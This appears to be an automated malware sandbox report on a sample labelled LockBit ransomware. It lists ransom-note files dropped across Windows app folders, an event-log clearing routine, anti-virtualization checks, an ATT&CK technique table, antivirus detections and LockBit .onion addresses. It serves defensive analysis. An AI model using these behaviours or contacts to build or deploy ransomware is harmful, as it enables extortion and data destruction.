            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{94fd83ea-55f6-4a66-95d5-64315122fb92}\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{844f5f98-087f-48ac-8c1f-1efdc9f3f424}\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{6bd640a4-a5f3-4bd9-9f66-5a758203d37e}\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{42e69a5f-f50b-4ab8-9366-0d7ecd1c46bc}\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{21a92316-54d2-4b2e-bdf7-3d2e07db3b14}\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0b11cf8d-da45-4b36-ad74-5b178b112358}\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{f7d1f2ce-1638-48ce-a40d-6b3a92a12dce}\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{96385bb4-2787-4948-bd9e-8eb130827bf5}\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{75784512-3587-4faf-a718-7e0905e2788b}\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{07e23474-3faa-40a5-947f-6a5b7376b175}\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AppData\Indexed DB\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\TokenBroker\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\TokenBroker\Cache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Temp\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\BackgroundTransferApi\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\TempState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\SystemAppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\RoamingState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\StagedAssets\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\MobilityExperience\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\MobilityExperience\ImageCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\Features\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\onesettings_waas_featuremanagement\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\353698\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\353694\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\338389\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\338388\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\338387\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\314563\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\314559\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\310093\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\310091\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\280815\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\280813\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\280811\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\280810\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\202914\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\Assets\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Temp\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\TempState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\SystemAppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\Settings\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\RoamingState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\LocalState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\LocalCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AC\Temp\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CapturePicker_cw5n1h2txyewy\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CapturePicker_cw5n1h2txyewy\TempState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CapturePicker_cw5n1h2txyewy\SystemAppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CapturePicker_cw5n1h2txyewy\Settings\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CapturePicker_cw5n1h2txyewy\RoamingState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CapturePicker_cw5n1h2txyewy\LocalState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CapturePicker_cw5n1h2txyewy\LocalCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CapturePicker_cw5n1h2txyewy\AppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CapturePicker_cw5n1h2txyewy\AC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CapturePicker_cw5n1h2txyewy\AC\Temp\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\TempState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\SystemAppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\Settings\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\RoamingState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\LocalState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\LocalCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\AppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\AC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\AC\Temp\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\TempState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\SystemAppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\Settings\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\RoamingState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\LocalState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\LocalCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\AppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\AC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D09198 RegCreateKeyExW,RegEnumKeyW,RegCreateKeyExW,RegSetValueExW,RegSetValueExW,OpenEventLogW,ClearEventLogW,CloseEventLog,RegCreateKeyExW,RegEnumKeyW,OpenEventLogW,ClearEventLogW,0_2_00D09198
            Source: C:\Users\user\Desktop\file.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Contains functionality to detect hardware virtualization (CPUID execution measurement)
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D010D4 0_2_00D010D4
            Source: C:\Windows\splwow64.exeLast function: Thread delayed
            Source: C:\Windows\splwow64.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D010D4 rdtsc 0_2_00D010D4
            Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D0748C FindFirstFileExW,FindNextFileW,0_2_00D0748C
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D0A064 FindFirstFileExW,FindClose,0_2_00D0A064
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D05C34 FindFirstFileW,FindClose,FindNextFileW,FindClose,0_2_00D05C34
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D07560 FindFirstFileExW,FindClose,0_2_00D07560
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D0F264 GetFileAttributesW,SetThreadPriority,FindFirstFileExW,FindNextFileW,FindClose,0_2_00D0F264
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D0763C FindFirstFileExW,GetFileAttributesW,FindNextFileW,FindClose,0_2_00D0763C
            Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
            Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D0A440 GetLogicalDriveStringsW,0_2_00D0A440
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Packages\windows_ie_ac_001\Jump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\TempState\Jump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\SystemAppData\Jump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Packages\windows_ie_ac_001\AC\Jump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\Jump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Packages\windows_ie_ac_001\AC\Temp\Jump to behavior
            Source: file.exe, 00000000.00000003.353101728.0000000000996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hyper-v~
            Source: file.exe, 00000000.00000003.355055365.000000000094E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: *|turn windows features on or off*|hyper-v3313
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D010D4 rdtsc 0_2_00D010D4
            Source: C:\Users\user\Desktop\file.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D05A30 LdrLoadDll,0_2_00D05A30
            Source: C:\Users\user\Desktop\file.exeCode function: EntryPoint,GetFileAttributesW,GetLastError,FreeLibrary,GetCommandLineA,GetModuleHandleA,GetLocaleInfoW,GetCommandLineW,GetProcAddress,GetLastError,GetLastError,FreeLibrary,CreateDialogParamW,LoadImageW,CreateWindowExW,LoadImageW,LoadMenuW,DefWindowProcW,LoadMenuW,IsDlgButtonChecked,GetDlgItem,LoadImageW,CreateDIBitmap,GetDeviceCaps,SelectObject,CreateFontW,GetPixel,GetDeviceCaps,SetPixel,BitBlt,SelectPalette,GetTextColor,GetTextColor,CreateFontW,CreateSolidBrush,0_2_00D1946F
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D010D4 cpuid 0_2_00D010D4

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management InstrumentationPath Interception1
            Process Injection            		11
            Masquerading            		OS Credential Dumping111
            Security Software Discovery            		Remote Services1
            Archive Collected Data            		Exfiltration Over Other Network Medium1
            Encrypted Channel            		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization2
            Data Encrypted for Impact
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
            Virtualization/Sandbox Evasion            		LSASS Memory1
            Process Discovery            		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
            Proxy            		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
            Process Injection            		Security Account Manager1
            Virtualization/Sandbox Evasion            		SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
            Obfuscated Files or Information            		NTDS5
            File and Directory Discovery            		Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
            Software Packing            		LSA Secrets121
            System Information Discovery            		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.common1
            Indicator Removal on Host            		Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            file.exe79%ReversingLabsWin32.Ransomware.Lockbit
            file.exe100%AviraBDS/ZeroAccess.Gen7
            file.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            0.3.file.exe.95ad4c.0.unpack100%AviraTR/Patched.Ren.GenDownload File
            0.2.file.exe.d00000.0.unpack100%AviraBDS/ZeroAccess.Gen7Download File
            0.0.file.exe.d00000.0.unpack100%AviraBDS/ZeroAccess.Gen7Download File

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion0%Avira URL Cloudsafe
            http://lockbitsupa7e3b4pkn4mgkgojrl5iqgx24clbzc4xm7i6jeetsia3qd.onionFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF0%Avira URL Cloudsafe
            http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.lyRR0%Avira URL Cloudsafe
            http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion4%VirustotalBrowse
            http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion.ly4%VirustotalBrowse
